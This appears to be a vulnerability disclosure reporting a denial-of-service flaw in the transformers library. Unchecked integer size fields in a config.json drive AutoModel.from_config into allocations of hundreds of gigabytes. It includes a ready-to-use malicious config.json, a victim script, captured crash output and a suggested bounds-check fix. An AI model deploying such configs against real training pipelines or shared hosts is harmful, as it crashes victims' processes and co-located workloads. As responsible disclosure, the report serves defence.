Unbounded memory allocation (DoS) from untrusted config.json integer fields via AutoConfig.from_pretrained + AutoModel.from_config
Target: huggingface/transformers (PyPI transformers)
Verified against: transformers==5.14.1, torch==2.13.0+cu130, Python 3.13
Class: Uncontrolled Resource Consumption / Denial of Service (CWE-789: Memory Allocation with Excessive Size Value; CWE-1284: Improper Validation of Specified Quantity in Input)
Preconditions: No trust_remote_code. No model weights required. Only a single attacker-controlled config.json (a few hundred bytes) on the Hub or a local dir.
Summary
When a model architecture is instantiated from a config object β the eager AutoModel.from_config(cfg) / direct Model(cfg) path, which does not use the meta-device / low_cpu_mem_usage deferred-init machinery β integer fields copied verbatim from config.json (vocab_size, hidden_size, intermediate_size, max_position_embeddings, β¦) flow directly into nn.Embedding / nn.Linear tensor-shape arguments with no upper-bound validation. torch's DefaultCPUAllocator then eagerly attempts to allocate vocab_size * hidden_size * 4 bytes (etc.) at construction time.
A few-byte config.json such as {"model_type":"bert","vocab_size":2000000000,"hidden_size":16} forces a 128,000,000,000-byte (128 GB) allocation attempt, crashing the process (on a real host the kernel OOM-killer terminates it). PretrainedConfig.from_dict applies no sanity / bounds check on these fields.
Root cause
PretrainedConfig stores config fields verbatim, with no bounds/sanity check on integer size fields. On the from-config path those integers reach tensor constructors directly. In transformers/models/bert/modeling_bert.py, BertEmbeddings.__init__:
class BertEmbeddings(nn.Module):
def __init__(self, config):
super().__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
...
and in the transformer blocks:
# BertSelfAttention
self.query = nn.Linear(config.hidden_size, self.all_head_size) # hidden_size
# BertIntermediate
self.dense = nn.Linear(config.hidden_size, config.intermediate_size) # intermediate_size
config.vocab_size, config.hidden_size, config.intermediate_size, and config.max_position_embeddings are attacker-controlled values read straight out of config.json by PretrainedConfig.from_dict (transformers/configuration_utils.py) β no field is clamped or range-checked. nn.Embedding(num, dim) immediately materializes a num x dim float32 weight tensor, so nn.Embedding(2_000_000_000, 16) requests 2e9 * 16 * 4 = 1.28e11 bytes up front.
The same pattern exists in essentially every architecture's __init__ (LLaMA, GPT-2, etc. all build embeddings/linears sized directly from these config integers); BERT is used here only as a concrete, minimal-dependency demonstrator.
Why the dominant from_pretrained path is not the reported vector (honest scope)
In transformers 5.x, AutoModel.from_pretrained initializes on the meta device and, when the attacker's tiny (or absent) weights do not match the inflated shapes, raises a size-mismatch error (ignore_mismatched_sizes=False by default) instead of allocating. So the cheap "config-only" variant is largely mitigated for from_pretrained. The practical vector is therefore:
AutoModel.from_config(cfg)β a documented public API used to re-initialize / train a model from scratch given a Hub config, and- any code that calls
from_config(or constructs a model class directly) on an untrustedAutoConfig.
Both eagerly materialize real tensors on CPU and are exploitable with a weights-free config.json.
Proof of Concept
Attacker artifact β attacker_dir/config.json (no weights, no remote code)
{"model_type":"bert","vocab_size":2000000000,"hidden_size":16,
"num_hidden_layers":1,"num_attention_heads":2,"intermediate_size":16,
"max_position_embeddings":2000000000}
Victim code β fc.py
from transformers import AutoConfig, AutoModel
cfg = AutoConfig.from_pretrained("attacker_dir") # untrusted config.json
print("loaded config vocab_size=", cfg.vocab_size, "hidden=", cfg.hidden_size)
model = AutoModel.from_config(cfg) # eager, no trust_remote_code
Running python fc.py immediately attempts a 128 GB torch allocation and raises RuntimeError; on a real host the process is OOM-killed.
Captured evidence (verbatim)
$ python fc.py # AutoConfig.from_pretrained(attacker_dir) ; AutoModel.from_config(cfg)
loaded config vocab_size= 2000000000 hidden= 16
EXC RuntimeError "[enforce fail at alloc_cpu.cpp:127] err == 0. DefaultCPUAllocator: can't allocate memory: you tried to allocate 128000000000 bytes. Error code 12 (Cannot allocate memory)"
# NEGATIVE CONTROL (benign config):
NEG-CONTROL OK params= 3056
# field-by-field controls (baseline builds; malicious field crashes):
hidden_size = 200000 -> RuntimeError "... DefaultCPUAllocator: can't allocate memory: you tried to allocate 1600000..."
intermediate_size = 2000000000 -> RuntimeError "... can't allocate memory: you tried to allocate 1280000..."
max_position_embeddings = 2000000000 -> RuntimeError "... can't allocate memory: you tried to allocate 1280000..."
# direct-construction confirmation (BertModel(cfg), vocab 2e9 / hidden 256):
EXC RuntimeError "[enforce fail at alloc_cpu.cpp:127] err == 0. DefaultCPUAllocator: can't allocate memory: you tried to allocate 2048000000000 bytes. Error code 12 (Cannot allocate memory)"
transformers 5.14.1 / torch 2.13.0+cu130 / Python 3.13
Interpretation:
- Attack: a weights-free
config.jsonwithvocab_size=2e9, hidden_size=16-> 128 GB allocation attempt ->RuntimeError(OOM-kill on a real host). - Negative control: an identical call path with a benign config (
vocab_size=32, hidden_size=16) builds a 3056-parameter model successfully β proving the crash is caused by the config values, not the harness. - Field isolation:
hidden_size,intermediate_size, andmax_position_embeddingsare each independently exploitable β each raised the allocator error while the baseline built cleanly. - Independent confirmation: direct
BertModel(cfg)withvocab_size=2e9, hidden_size=256-> 2 TB (2,048,000,000,000-byte) allocation attempt.
Impact
Denial of service. A victim who calls AutoModel.from_config(AutoConfig.from_pretrained(untrusted_repo)) β the standard "re-init a model from a Hub config" pattern used in training / fine-tuning pipelines and in code that instantiates architectures from user-supplied configs β is forced into an unbounded up-front host-memory allocation from a few-hundred-byte input. The kernel OOM-killer terminates the process (and can collateral-kill co-located workloads on a shared host). No weights, no trust_remote_code, and no code execution on the victim are required β only the ability to make the victim load an attacker's config.json.
Suggested remediation
Add bounds/sanity validation of integer size fields in PretrainedConfig.from_dict / __init__ (reject absurd vocab_size/hidden_size/intermediate_size/max_position_embeddings, or cap them against a configurable ceiling), and/or validate these fields before they reach tensor constructors on the from-config path.
Dedup / prior-art note
- Distinct from GGUF-based transformers DoS reports (different file format and loader path).
- Distinct from
trust_remote_codeRCE issues β this requires no remote code and no weights. - Distinct from the
from_pretrainedweight-loading path, which in 5.x is mitigated for this cheap variant by meta-device init + size-mismatch checks (documented above). The reported vector is specifically the eagerfrom_config/ direct-construction path. - No CVE was found assigning bounds validation to
PretrainedConfiginteger size fields on the from-config path as of the test date (2026-07-16).